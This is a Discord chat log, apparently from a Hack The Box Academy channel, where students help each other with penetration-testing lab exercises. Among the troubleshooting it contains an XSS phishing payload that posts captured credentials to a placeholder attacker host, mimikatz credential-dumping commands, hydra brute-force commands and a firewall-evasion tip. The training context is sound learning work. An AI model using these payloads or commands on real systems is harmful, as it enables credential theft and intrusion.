#modules

1 messages ยท Page 230 of 1

hexed python
#

I did mod it with 1337 and add /etc/hosts like the module said

#

and I still have this error

#

echo 10.10.10.174 server.fatty.htb >> C:\Windows\System32\drivers\etc\hosts

#

this is the command I used.

#

rebuild with a new jar file and I still have this same error

#

I even revert a box too.

fathom pendant
hexed python
#

let me try with my own ip

fathom pendant
#

Idk what all it had you set up

valid viper
#

Hey Marcie, have you started the CWEW by any chance?

fathom pendant
#

No idea what CWEW is

#

But if you mean CWEE? no

hexed python
#

This is the one

#

I gonna replace it with my IP

fathom pendant
#

I haven't done this module so idk what it's expecting ยฏ_(ใƒ„)_/ยฏ

#

Also you typed it as 10.10.0.174

hexed python
#

just like the module said, yes

fathom pendant
#

Sometimes the examples aren't 1::1

hexed python
#

well I gonna try with my ip

fathom pendant
#

Sometimes you gotta determine when it's referring to your ip or the machine ip

#

And Sometimes you can tell by how it's phrased in the examples

hexed python
#

nope

#

neither my ip works

fathom pendant
#

Two conflicting things here

hexed python
#

oh it's 10.10.10

#

sorry

fathom pendant
#

Then why does your screenshot show 10.10.0?

hexed python
#

oh no

fathom pendant
#

Literally why I asked a minute ago

hexed python
#

ok nevermind it didn't work

valid viper
#

You can pop a shell from inside SQL?

hexed python
#

depending on the context

hexed python
fathom pendant
#

if it's set up a certain way you can even upload things

patent oak
# hexed python

I finished this one today. I took a break yesterday and definitely forgot all about the etc host thing today but it all still worked just fine ๐Ÿคทโ€โ™‚๏ธ

marble spire
#

Hey i got this error everytime i run evil-winrm through proxychains on my local VM, when i do the exact same thing on the pwnbox it works. I checked both proxychains configuration files and they are the same

Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

Does anyone ran into this error before ?

fathom pendant
hexed python
#

I guess update winrm ?

fathom pendant
#

nah you'd need to update your ssl conf file

#

it's not really a winrm fully issue

#

it's how winrm uses openssl

#

worst case scenario, you need to reinstall your vm

#

as it's just cooked

patent oak
marble spire
patent oak
#

That module took my mojo today

fathom pendant
#

google the error and see if you can find a fix

hexed python
#

or chatgpt

marble spire
#

I has been searching for 2 days

#

Some ppl talk about vpn issue

#

tried everything but nothing works

fathom pendant
marble spire
#

So I thought maybe someone had already had that

fathom pendant
#

forgot you can't see the starting-point channel since your account isn't linked

hexed python
#

YOOO

#

I GOT IT WORK !

hexed python
cedar yew
#

I can't find ๐Ÿ˜

fathom pendant
#

you literally found it kek

#

also delete as it's a spoiler

#

that's literally it, just because it doesn't end in .ccache doesn't mean it's not a ccache file

cedar yew
#

Well, I cannot extract this file or use it as a keytab, what can I do?

fathom pendant
#

dude

#

it's a ccache file

#

you don't need to do anything with it as a keytab

#

just put it as the KRB5CCNAME variable

#

and it'll work

cedar yew
#

heee

#

oky

fathom pendant
#

it's explained in the section to do that

#

for ccache files, and it's how you impersonated julio earlier iirc

valid viper
#

For the SMTP section of footprinting module it's asking for a user...

#

I'm using smtp-user-enum and have given it two different users...neither is being accepted.

fathom pendant
valid viper
#

I'll just try them all.

#

The hint references a wordlist, but I'm not seeing one in the course materials.

fathom pendant
#

there's a referenced wordlist in the section reading

#

oh wait isn't there the footprinting wordlist from the resources button?

valid viper
#

Finally.

#

Not that I saw, no.

#

Oh wait...

fathom pendant
#

the hint

valid viper
#

LOL yeah ๐Ÿ˜›

#

You're awesome ๐Ÿ™‚

fathom pendant
#

deleting it but yeah

valid viper
#

I pulled it with the big wordlist, just took a while.

fathom pendant
#

always check the resources button when you go into a module

valid viper
#

Many thanks.

#

I was checking the cheat sheet only :/

fathom pendant
#

cheat sheet isn't always gonna be helpful or give context of the commands

valid viper
#

Right, well at least I had a big enough wordlist XD

#

90 gigs worth.

#

I had more ready ๐Ÿ˜

fathom pendant
#

word of note: HTB will never have you running super large wordlists for bruteforcing

deep owl
#

hello all

#

module: Cross-Site Scripting (XSS)

onyx robin
#

hi everybody! i was doing recursive fuzzing with ffuf in the attacking web application with ffuf module, but i forgot to connect to the academy-regular vpn! i tried to ping the ip:port given by the exercise but i did not pinged anything! I hope i didn't make a mess...but if i lost all the packages during ping i think i'm safe

deep owl
#

section: Phishing

deep owl
#

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

#

am not able to remove the image url as requested although i have entered the correct code

#

can anyone who finished the XSS module dm me please

heavy edge
#

OKAY IM SORRY but that hard lab was bs in common services

#

not enough info about remote readin on linked servers using mssql

#

i literally had to read a 32 page article on all of it and on how to execute commands on remote links. which it did not touch on

lime marlin
#

hello everyone im new to this, so please excuse the stupid question but am i supposed to be setting up the VPS inside the VM or on my computer?

glacial raft
#

hey @fathom pendant . is there a simpler way i can solve this

#

this command just lists out too many things

fathom pendant
#

The example command they give also works well

glacial raft
#

these two are still incorrect

#

@fathom pendant

fathom pendant
#

Sec

glacial raft
#

alright

fathom pendant
#

It's asking for larger than 25k

#

-size +25k and -size -28k will narrow it further

crystal steeple
#

Will there be any red team modules in the future?

glacial raft
glacial raft
fathom pendant
quasi wave
#

I'm having trouble understanding IPMI. I have taken notes on the section but I really want to get to the next section and its been a week of me reading and rereading the section and trying to understand it. Should I just do my best and start trying to break in and when I get the flags move on? I feel like maybe I need to come back to IPMI later but I am not gonna skip the section.

#

I am not gonna look up the answer but I'm just wondering if reading through it one time and just following along with the examples would be good for now.

#

I feel like this section can be completed by following along with the exact examples in the text.

#

I have read and reread many times and taken notes.

fathom pendant
#

There's only one thing that's not necessary from that section

#

And that's the mask it gives

quasi wave
#

I am following along with examples and its not giving me username or password so I kind of can see

fathom pendant
#

Other than that all good and should be able to use the provided wordlist or rockyou to crack it

quasi wave
#

ok thanks

fathom pendant
#

If you're unsure why the hash you get from msfconsole doesn't just give you the answer, it's because the hash isn't in the default wordlist for that tool in msfconsole

valid viper
#

Interesting.

quasi wave
#

I'm trying different wordlists

#

your sure its in rockyou? what username file should I use?

#

I'm going through various wordlists

fringe urchin
#

let me go take a look

quasi wave
#

ok

fringe urchin
cedar yew
#

It asks me to log in to the machine via SSH, but when I enter the password, I get an access denied error.

question - Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

quasi wave
#

because it needs both a username and password file

#

unless I should just do IPMI usernames

#

and do rockyou for passwords

fringe urchin
#

since you already have the username

fathom pendant
#

Also the hash that ipmi gives you has the username

#

username:password/hash

fathom pendant
quasi wave
#

hold on I think I got it

#

I set right username file and found rockyou.txt and set that to password file

#

we'll see if it cracks soon

#

its still not cracking let me show you my output

#
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> show options

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name               Current Setting    Required  Description
   ----               ---------------    --------  -----------
   CRACK_COMMON       true               yes       Automatically crack common
                                                   passwords as they are obtai
                                                   ned
   OUTPUT_HASHCAT_FI                     no        Save captured password hash
   LE                                              es in hashcat format
   OUTPUT_JOHN_FILE                      no        Save captured password hash
                                                   es in john the ripper forma
                                                   t
   PASS_FILE          /usr/share/wordli  yes       File containing common pass
                      sts/rockyou.txt              words for offline cracking,
                                                    one per line
   RHOSTS             10.128.244.138     yes       The target host(s), see htt
                                                   ps://docs.metasploit.com/do
                                                   cs/using-metasploit/basics/
                                                   using-metasploit.html
   RPORT              623                yes       The target port
   SESSION_MAX_ATTEM  5                  yes       Maximum number of session r
   PTS                                             etries, required on certain
                                                    BMCs (HP iLO 4, etc)
   SESSION_RETRY_DEL  5                  yes       Delay between session retri
   AY                                              es in seconds
   THREADS            1                  yes       The number of concurrent th
                                                   reads (max one per host)
   USER_FILE          /usr/share/metasp  yes       File containing usernames,
                      loit-framework/da            one per line
                      ta/wordlists/ipmi
                      _users.txt


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> 
#

its doing soemthing wrong

fringe urchin
#

where is the hashcat command?

#

thats just msf where it dumped the hash

#

you still need to crack it

quasi wave
#

ok so I need to look up where it dumped the hash?

quasi wave
#

ok hold on

fathom pendant
#

You put 10.128

fringe urchin
#

oooh wait you didnt even get the hash?

quasi wave
#

ok thanks

fringe urchin
#

or whats the problemthinking2

fathom pendant
#

Targets start with 10.129 on the vpn

fathom pendant
quasi wave
#

ok changed rhosts

#

thanks

fringe urchin
fathom pendant
#

Same

#

Which is why I asked for command

fringe urchin
quasi wave
fathom pendant
#

Nope

#

Only if it's in the default wordlist

quasi wave
#

ok so I should look up where metasploit saves hashes?

fringe urchin
fathom pendant
#

It tells you where it saves it to

#

But it should also print it in the terminal

valid viper
#

The footprinting module is just...ugh.

quasi wave
fringe urchin
fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

#

By far its one of the easier ones

valid viper
#

sudo openssl s_client -connect 10.129.175.104:imaps

#

Why will it not let me login?

quasi jungle
quasi wave
#

thanks ok figured out username and password and got flags

fathom pendant
#

<anything> [command] [parameters]

#

As shown in the examples

#

1 login user pass

#

But you can literally prefix it with anything AFAIK

valid viper
#

๐Ÿ˜

fathom pendant
#

You can even use a 20 character string

valid viper
#

This stuff is a trip.

fathom pendant
#

Which is why it says "like: a login user pass"

#

The a is the prefix

fringe urchin
#

wait till he gets to the point where he needs to figure out how to read the content of the email PepeWork

valid viper
fringe urchin
fathom pendant
#

I will die on the hill that they need to change the all to body[]

valid viper
#

The point is still made.

#

I would use ASCII art but...I'll banned for sure then.

fringe urchin
#

have you managed to login now PepeWork

fathom pendant
#

The more you say you dislike it the worse it will be for you

valid viper
#

Like Burp.

fringe urchin
#

iirc you will see burp at shells n payloads the first time

fathom pendant
#

If you read and follow #welcome you can avoid the skill issue

fringe urchin
#

so a few away

fathom pendant
fringe urchin
#

ah

valid viper
#

Yes.

fathom pendant
#

But tbh knowing how to do things at a baseline is important

valid viper
#

Enumeration/Footprinting isn't fun to me.

fathom pendant
#

Well it's important

fringe urchin
#

ufff thats the main point

fathom pendant
#

And improper enumeration will bite you in the ass

valid viper
#

To an extent, yeah. But with web apps it seems more straightforward.

fathom pendant
#

Well cpts isn't about web apps

valid viper
#

Not if I compile the app locally.

#

I know, that's why I'm doing it.

fathom pendant
#

So get ready to struggle bus your way out of your comfort zone

valid viper
#

It was just the one thing.

#

The prefix... ๐Ÿ˜ I've never seen that before.

fathom pendant
#

Also a lot of the stuff you'll see on the attacking common services section

fathom pendant
fringe urchin
#

its in the module tho sosadje

valid viper
fathom pendant
#

Not really

valid viper
#

It is to me.

fathom pendant
#

Idk how it's counter-intuitive tbh

valid viper
#

Well, look at Bash.

fathom pendant
#

Ok?

valid viper
#

I don't need a prefix to throw a command at that...or anything else I've interacted with.

fathom pendant
#

Looking at my bash terminal

#

Well this is a different technology

valid viper
#

Why not have a prefix in SQL?

#

It's a...unique technology.

fathom pendant
#

You have to end commands with ;

valid viper
#

Yes.

#

But it MUST be a semicolon.

#

Which makes sense, because that goes back to C-type languages.

fathom pendant
#

But also: at the end of the day, it WAS told to you

#

You just either glossed over it or didn't read

valid viper
#

Glossed over for sure.

fathom pendant
#

When you get stuck next time: re-read the section

#

Often the answer lies in the material

valid viper
#

I want ice cream.

fathom pendant
#

Go for it dude

valid viper
#

1 FETCH 1 BODY[]

#

Cute...

fringe urchin
fathom pendant
#

The [] are actually important

crystal steeple
valid viper
#

Well yeah, it denotes an array.

#

Or in this case...content I guess.

#

It should be "" but whatever XD

fathom pendant
#

Well it's basically telling it to grab all data within

valid viper
#

Wouldn't that be an * ?

fathom pendant
fathom pendant
valid viper
#

Ah, body data is stored in an array?

fathom pendant
#

You can Google it and learn

valid viper
#

I will say, this is MUCH better than the OSCP.

#

The course for that made me want to put my face through a plate glass window.

fathom pendant
#
nickb.dev

Introduction This will be a detailed, though not exhaustive, quickstart into using IMAP. Initially this was also going to highlight the python library, imaplib, but the post became too long! Maybe next time.
The hope is that thisโ€™ll contain enough information about querying email servers that additional questions would most likely be redirected ...

valid viper
#

Thanks. Yes SNMP is more straightforward.

#

Although that may be because I have a networking background ๐Ÿ˜›

novel hinge
#

trying to find a way to transfer back to my attack host. tried smbserver to trasnfer like in the ATtacking SAM and ATTACKING Lsass. Trying to get the lsass.dmp off the windows machine

#

smbserver did not work

heavy edge
#

if you are rdping, connect a drive or make an smbshare

fathom pendant
novel hinge
#

@heavy edge tried smbshare. will try connecting a drive but idk if ive learned that yet

heavy edge
fathom pendant
#

it's not taught to you

heavy edge
#

yes it is.

#

theresa section where they tell yuo to connect a share

fathom pendant
#

then it seems like they recently added it

novel hinge
fathom pendant
#

not creating a share

fathom pendant
fathom pendant
# novel hinge

note the purpose of this isn't to transfer files, it's to steal the hash

heavy edge
fathom pendant
#

which you can use for multiple purposes; either a PTH technique or cracking it

novel hinge
#

ahhhhh i didnt even see that ;c

fathom pendant
heavy edge
#

fie transfers which is before the passwords

#

it wasnt in foothold my bad

fathom pendant
heavy edge
#

anywasy yeah if ur in the password section that measn you got thru file xfers section ideall in which it was shown there

#

@novel hinge

fathom pendant
#

if they're in footprinting the method they're doing is literally explained in the SQL section

novel hinge
#

in password section currently

fathom pendant
#

"password section"

#

you mean password attacks module?

novel hinge
#

yes xd

fathom pendant
fathom pendant
novel hinge
#

so these are multiple hashes that belong to multiple users? even though i wasnt able to get the file im guessing it read the contents of the lsass.dmp?

fathom pendant
#

just follow the section along and you'll be fine

fathom pendant
heavy edge
fathom pendant
#

that's not the lsass dump

novel hinge
#

ahhh

#

okok thank you

heavy edge
#

yeah thats not an lsass dump thats just an admin hash

#

did you look tt how to dump the lsass?

fathom pendant
novel hinge
#

yeah either through task manager or the other method i forgot i just do task manager

heavy edge
#

i know they arent dumping it

fathom pendant
#

which has nothing to do with grabbing hashes

novel hinge
#

im on Pass the hash section

fathom pendant
#

oh

heavy edge
#

what is it ur asking

#

because im lost now

novel hinge
#

they didnt give me the hash for davids account. how do i get his hash

#

im guessing through lsass right?

heavy edge
#

using the tools that were talked about

fathom pendant
fathom pendant
#

Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?

novel hinge
#

ive tried mimikatz in c:\tools i wasnt able to get it thats why i started doing lsass

heavy edge
#

have you looked at how to use mimikatz?

#

becaue it tells you how to use it

heavy edge
#

look at how you use mimkatz and youll be able to dump the hash

novel hinge
#

yes i went back in a previous section and did the dump and it didnt work ill try again and send my results back give me 2min

fathom pendant
#

because the hash may also just not be present in lsass (it could be)

heavy edge
#

cmd as admin > mimikatz > priv::debug > token::elevate >lsadump::sam

#

iirc

fathom pendant
#

you can also just look at the cheatsheet

#

i can't remember what section it tells you how to use mimikatz to extract info

novel hinge
#

does this look right?

fathom pendant
#

the arrows weren't meant to be put in literal

heavy edge
#

........................

fathom pendant
#

they were meant to be sequential steps

heavy edge
#

if people took me as literal as you do id be so goddamn rich rn

heavy edge
#

ngl i did fiercly blow air out of my nose seeing that

solid quail
#

I have a question regarding this module : Introduction to Windows Command Line:

I finished the first question: "SSH to with user "user0" and password "Start!"
The flag will print in the banner upon successful login on the host via SSH."

Question 2: "SSH to with user "user1" and password "previous flag"

  • 1 Access the host as user1 and read the contents of the file "flag.txt" located in the users Desktop."

When I try to SSH and Access the host as user1 I get an error stating that the password is denied.

Do i do this while logged into User0?

fathom pendant
#

"previous flag" is the previous answer

#

so user1 password would be the answer you got for user0, user2 password is user1 answer...

solid quail
#

omg thank you~ I have been trying this for the past hour lol. Appreciate the help!

novel hinge
#

so i read through that post marcie, ended up just going back to the commands that execpanda gave. it doesnt show any credentials for a user named "david"

fathom pendant
#

or a number of other things

novel hinge
#

sekurlsa::logonpasswords got it now. lets see if i can finish this section now

twin lion
#

I'm on this question for the password attack module: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.

So i've downloaded the resources.zip and ran this to make the wordlist
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
Then I did hydra -l sam -P mut_password.list 10.129.202.64 ssh -t 4 first and now i've done hydra -l sam -P mut_password.list ssh://10.129.202.64

It has been cracking for fuckin decades somebody please help

fathom pendant
#

there's more than ssh open

twin lion
#

aw man

fathom pendant
#

also: you can increase threads with -T

twin lion
#

thanks i shouldnt have been rushing to play super mario bros wonder

fathom pendant
novel hinge
fathom pendant
#

get that knocked in your head

novel hinge
#

i think hes doing that one right, i just did that one

twin lion
#

i will knock it in

fathom pendant
#

it just makes it go a bit faster

#

the main issue is attacking ssh

#

which for hydra is VERY slow

novel hinge
#

you can enumerate more to get the password in that one?

#

damn i just brute forced that one after taking the 20k

fathom pendant
#

i wanna say ftp, ssh, and smb? it's been a minute

novel hinge
#

i think youre right, i def remember ftp

novel hinge
#

nvm

weak fractal
#

anyone ?

potent ermine
# weak fractal anyone ?

Open wireshark and start listening on the main interface. I know it sounds crazy because there's no internet connection in the target box, but just run it and you'll see the traffic coming in. Then you'll be able to see HTTP packets and see the domain

supple oracle
#

u're a lifesaver! I've found the right direction of attack now.

latent glen
#

@next bronze I can confirm your dump tool is pretty neat! It's a goto now ๐Ÿ˜„

next bronze
#

awesome, thanks! peepohappy

heavy edge
#

ill have to try it out

shadow current
next bronze
#

it's in the module's resources iirc

tulip dragon
#

i am stuck on flag4 on linux priv assessment

#

any hint , found tomcat but can't find any way to exploit

naive wadi
#

in windows privesc module does anyone know the difference named pipes, as in, Syntax: \\.\pipe\<pipename> or \pipe\<pipename> ? I can query LSASS with both but only SQL with the latter which makes me thinks it's an API or env thing?

next bronze
naive wadi
#

as in .\accesschk.exe /accepteula \\.\Pipe\lsass -v & .\accesschk.exe /accepteula \Pipe\lsass -v both work

#

but .\accesschk.exe /accepteula \\.\Pipe\SQLLocal\SQLEXPRESS01 -v will not work

#

but .\accesschk.exe /accepteula \Pipe\SQLLocal\SQLEXPRESS01 -v will work

naive wadi
#

The period represents the local computer

#

but when it's omitted what does it mean? That's what I am trying to figure out

topaz sable
#

Guys if I do upto tier 2 modules will I be able to do htb boxes?

#

Like the hard ones?

fathom pendant
#

maybe

#

ยฏ_(ใƒ„)_/ยฏ

#

most boxes have some sort of gimmick/cve related to them

#

or their name hints at what the vuln may be

topaz sable
#

Guys I have a student gmail account right now. Eventually I'll get alumni gmail account.

#

Will I be able to use alumni gmail account to get student subscription

fathom pendant
#

if it's a .edu email it should be fine

topaz sable
#

It's not a .edu email ๐Ÿฅฒ

next bronze
#

it's how accesschk reads the input

fathom pendant
devout thorn
#

PS: I have a .net mail address

fathom pendant
#

^

#

i mean i used very broad words

fathom pendant
#

likely and generally aren't the always

#

the only people that know 100% would be support

topaz sable
#

Can I use the student mail and get discount even after I graduated college?

autumn pilot
#

Will you be a student after you graduate?

patent oak
topaz sable
strange forge
dreamy yew
#

Module: Active Directory Enumeration and Attacks, Section: Credentialed Enumeration - from Windows, **Question: I can't seem to execute Snaffler **using .\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data

fathom pendant
#

what errors are you getting>

dreamy yew
#

its ok i found it in C:\Tools, false alarm

fathom pendant
#

remember: .\ is convention for "current directory"

dreamy yew
#

yep thanks mate

glossy flame
#

On Detecting DCSync/DCShadow the question:

Modify the last Splunk search in this section by replacing the two hidden characters (XX) to align the results with those shown in the screenshot. Enter the correct characters as your answer.

I got the correct answer, but I am wondering why replacing the XX with the wildcard " .* " dont show the answer thinkw .

| rex field=Message "(?P<gcspn>.*\/[a-zA-Z0-9\.\-\/]+)" 
| table _time, ComputerName, Security_ID, Account_Name, user, gcspn
| search gcspn=*```
fathom pendant
#

because you're looking for something more specific

#

while wildcards can be useful they can also be so broad they miss the mark

glossy flame
#

but it returns just 6 events and if I replace with the answer it will show different events

#

shouldn't it return all the events?

fathom pendant
#

not really

#

it's returning results that match a different set of criteria

latent fox
#

Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)

acoustic owl
#

find might help

wind gust
#

Why is there no new content on the academy ?

strong forum
#

I would like to know the intention of the problem in "Firewall and IDS/IPS Evasion - Hard Lab".
When I search for ports, I see multiple filtered ports.
But I don't understand if --source-port can only get flags 53 port.
Why isn't the other port working?
And I don't know why I had to target a 50000 port.

53/tcp filtered domain
54/tcp filtered xns-ch
55/tcp filtered isi-gl
50000/tcp filtered ibm-db2

quick crane
#

who can help me DACL Attacks Skill Assessment fourth question

quick crane
fringe urchin
# strong forum I would like to know the intention of the problem in "Firewall and IDS/IPS Evasi...

you asking why --source port was important?

well its common for IDS/IPS ( firewalls and intrusion detection systems) to be configured to allow some kind of traffic.
and since port 53 is DNS which a lot of firewalls "allow" traffic from it since its a dns, the packets/traffic appears legitimate.
so with source port 53 we can evade filters.

like with source port we can fool the IDS/IPS that the request or well traffic comes from a "Trusted" service.

strong forum
fringe urchin
#

and see

languid ginkgo
#

module: Active Directory Bloodhound
Hello,
someone passed the last skills assessment question ?
Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).

||I have a total of 15 AD users and 3 Azure users||, right ?

blazing scarab
#

d

quick crane
#

have anyone can hint the dacl attacks module

next bronze
#

normal users, not special or default accounts

strong forum
# fringe urchin show me your command

My command is this.
But it's all filtered.

[โ˜…]$ sudo nmap -p53,50000 10.129.232.134
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-04 10:58 BST
Nmap scan report for 10.129.232.134
Host is up (0.14s latency).

PORT STATE SERVICE
53/tcp filtered domain
50000/tcp filtered ibm-db2

quick crane
fringe urchin
hollow ibex
#

Today i compelte web service and api attacks module at htb but i have some miss conception about soap.

#

My question is that soap is a web service or protocol ???

dreamy solar
#

Hello man

#

To know that the login admin, I must to look the token? But I do a list of the 200 UID and I don't find a diffent token ^^"

gentle root
strong forum
soft cedar
#

Any different result when you manually manipulate the request?

wooden perch
fringe urchin
shadow cradle
#

Hi All, I do have a question about the Skills Assessment of Shells & Payloads. I'm still chasing the second flag. I did investigate the blog and checked the post wiht relative exploti. Shall I fix the exploit or should I try to re-use the already present on the server?

soft cedar
warm crater
shadow cradle
#

I loaded in msf the exploit from exploit-db but it' raise an error for the split function

warm crater
#

I just re did the assessment like an hour ago and it worked fine on my end. No tweaking required.

shadow cradle
soft cedar
shadow cradle
#

thanks for the help I'll try it out

#

if i may ask one more thing.. the foothold host is lagging very much. Is it normal?

warm crater
#

iirc the foothold is indeed laggy. You can start the ssh server and go from there.

shadow cradle
#

that's what's I'm doing but I can't type more than 3char straight hehe. I'll just be patiente ๐Ÿ˜„

fringe urchin
next bronze
#

skill issue just pivot or start sshd so you don't have to use rdp

heavy edge
#

finally

fringe urchin
#

my ssh dont have a gui so i could look at the website susge

fringe urchin
next bronze
#

so it's skill issue kekw

heavy edge
#

what module are you on

fringe urchin
heavy edge
#

oh

fringe urchin
#

well to be fair i did it in the past but forgot so would need to look it up lol

heavy edge
#

you need to use the pwn box for that

#

i think

fringe urchin
#

ew pwnbox

fathom pendant
#

only one question directly asks about the location on the pwnbox

#

other than that; you can use your own machine

heavy edge
#

it was easier for me to use pwn on that one

fathom pendant
#

i used my own vm just fine

#

ยฏ_(ใƒ„)_/ยฏ

frail hinge
#

Hi! sorry can someone help me. I'm in the Footprinting Lab - Medium and after enter to remmina and find the user i can't enter as and admin because the password contains "@" and this caracter doesn't work as normal in my mac.

#

if someone knows why or how to resolve it i will really appreciate it

fathom pendant
#

oh wait remmina

#

idk how you normally get the @ in mac ยฏ_(ใƒ„)_/ยฏ

#

also idk what you mean by "this character doesn't work as normal"

fringe urchin
#

Damn host 3 done in less then 10 min

fathom pendant
#

are you copy/pasting the password you found? or manually typing?

#

if copy/pasting: are you sure you don't accidentally have any extra spaces?

frail hinge
fathom pendant
#

try shift+2 if you're using a vm

soft cedar
frail hinge
wintry river
#

Hello

fathom pendant
#

"doesn't give option at all" not descriptive

#

are you saying that for whatever reason it won't let you copy?

frozen mesa
#

LINUX PRIVILEGE ESCALATION --> Docker --> where to start? I cannot find anything useful to start a docker with or something else...

fringe urchin
fathom pendant
#

like you can't right-click -> copy or ctrl(cmd)+shift+c?

soft cedar
fathom pendant
#

also: as I said - it sounds like the keyboard is standard US keyboard layout - so shift+2 would be the @ sign

frail hinge
fathom pendant
#

copying from linux terminal requires the shift key, as ctrl-c is already bound to quit running process

fringe urchin
#

and once you in a pwnbox controls swap to native linux so ctrl shift V

fathom pendant
#

they're trying to copy

frozen mesa
fringe urchin
#

well to paste

#

ah

fathom pendant
#

they're pasting into a GUI

soft cedar
fringe urchin
near tinsel
#

Hello

#

Just finished a couple of CTFs. I noticed I had to look up a lot of stuff frequently (commands, services to use, what the next step would, etc.). Is this normal?

fathom pendant
#

especially if you're new to hacking

near tinsel
#

Gotcha, thanks!

soft cedar
#

Just gotta look back at the section from there..

fringe urchin
frozen mesa
languid ginkgo
next bronze
#

that could work but it will return a few extras, ignore the standard account and machine accounts

#

or you can just search @domain

soft cedar
soft cedar
scarlet copper
#

Good afternoon I can't understand why the button is not interactble after I make my changes.

Module: Using Web Proxies
Section: Skills Assesment
Question: The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

What I have tried: I intercepted the response and removed disabled from the html code then forwarded the response but when I click the button there is no flag.

frozen mesa
soft cedar
frozen mesa
#

Did some RTFM, slightly understanding now how it works. Now i need to find out to start what Docker and how. Thanks for the help.

soft cedar
#

the socket then bridges that gap between the client & server.

frozen mesa
#

Hm will try. More of a Docker module than escalation techniques ๐Ÿ˜ฆ

frozen mesa
#

Thanks for the patience ๐Ÿ™‚

soft cedar
frozen mesa
#

@soft cedar I misunderstoond some of the explanation (English isnt my first language). With your help I've figured out what they tried to teach me. Thanks ๐Ÿ™‚

topaz sable
#

Guys what should I learn to be able to start cracking htb machines?

coral flare
#

Hi, inside the Brute Forcing module there is the task to bruteforce the ssh login for a certain user. When I try to fire up hydra against the target I get the error that the target does not support password authentication. Trying to connect via ssh user@ip reveals that it actually does not. I am using the pwnbox so I am guessing this is a bug?

languid ginkgo
next bronze
#

just @domain in search

blazing laurel
#

hello

languid ginkgo
next bronze
#

it's not

#

I'm looking at it right now, they return different number of accounts

languid ginkgo
#

for me it's always ||15|| ๐Ÿค”

coral flare
#

Can someone from HTB Team explain how I can get help for one of the questions in the academy? I am a silver subscriber for it and I have my discord linked but I cannot find the option anywhere.

next bronze
coral flare
languid ginkgo
rustic sage
#

Is there a way to remove the pwnbox display in the modules? Every single time I switch to the module the display downsizes. A reload fixes the pwnbox, but when I've RDP'd into somewhere else the RDP sessions downsizes as well which isn't fixed on reloads.

fathom pendant
#

no

#

however with most rdp tools you can enable dynamic resolution

#

which allows you to resize the screen

jaunty stirrup
#

Are the CTF's self paced or anything? Also, do you only get two free hours and then you have to pay? I'm just asking...

fathom pendant
#

wrong channel to ask; but CTFs are self paced -- and 2hr is lifetime of your account -- so yes

#

you can always use your own vm and the vpn

coral flare
#

You can press on fullscreen which will make it jump to its own tab

coral flare
fathom pendant
#

they're talking about while being in an rdp session

#

and they load a new page in academy

#

the full screen resizes down

coral flare
#

I see.

#

Ma'am!

fathom pendant
coral flare
echo wren
#

"If xss.htb.net was an intranet application, would an attacker still be able to capture cookies via sniffing traffic if he/she got access to the company's VPN? Suppose that any user connected to the VPN can interact with xss.htb.net. Answer format: Yes or No"

Taking a poll.... who thinks it's possible to sniff HTTP traffic from other users by way of your local machine's client VPN interface?

Am I missing something or this is a poorly written question?

fathom pendant
#

It's possible

coral flare
fathom pendant
#

I suggest rereading the section and maybe you glossed over something

heavy edge
#

do you understand how vpns and network traffic work?

echo wren
#

Why would TCP traffic end up reaching an incorrect VPN interface? It's not a broadcast, and this is session security, it's not talking about ARP poisoning, MITM, etc....

tulip dragon
#

is htb academy poorly written

heavy edge
#

what do you mean incorrect vpn IF. it asks if YOU had access to the companys vpn

coral flare
heavy edge
coral flare
#

Employees are connected to the companys infrastructure via client to site vpn.

echo wren
#

Years of experience with AnyConnect and GlobalProtect. I have a very good understanding of what traffic I can see from my local machine when I connect to a VPN - it's traffic from my client to whatever server, not traffic from other clients

coral flare
#

This is the scenario that is given to you.

coral flare
heavy edge
#

you can still sniff that traffic from other clients to the server on the subnet

coral flare
#

There are no broadcast domains or routing at play here. You are not grasping the question I feel like.

fathom pendant
echo wren
fathom pendant
#

brother you're overthinking it

heavy edge
fathom pendant
#

it's not asking the granular details of it

coral flare
echo wren
#

I'm just pointing out that it's a poor question

fathom pendant
#

it's saying if it's possible

#

which it is

heavy edge
#

im not even to that module( looks at Marcie) yet and i understand it

coral flare
#

It is ok not to know everything - I don't either but stop arguing over basic IT knowledge.

fathom pendant
coral flare
#

I work in it-sec and I know how VPNs work.

heavy edge
#

not section

fathom pendant
#

because modules and sections are inherently different

coral flare
fathom pendant
#

sections are parts of modules

coral flare
fathom pendant
coral flare
#

@fathom pendant chill, I said - wrong reply ๐Ÿ˜„

fathom pendant
#

Ik

coral flare
#

lmao

fathom pendant
#

but the point is: The question was phrased in a broad manner

#

it wasn't phrased in a granular "if a or be" or "traffic getting routed to you somehow"

#

sniffing doesn't require seeing traffic come to you

#

especially since it's giving you an intranet site

coral flare
#

It is a simple thing. If the question doesn't name other variables - they are not at play. Anyone who has done some sort of IT certification, knows this. Especially CCNA is known for this.

heavy edge
#

^ yup

uneven oracle
#

Yโ€™all on here being pettyโ€ฆ? ๐Ÿ‘€

heavy edge
#

if you dont like the wording, apply to htb, take 4 years to advance to academy dev, find the backend academy site, find the SECTION then change it

fathom pendant
fathom pendant
#

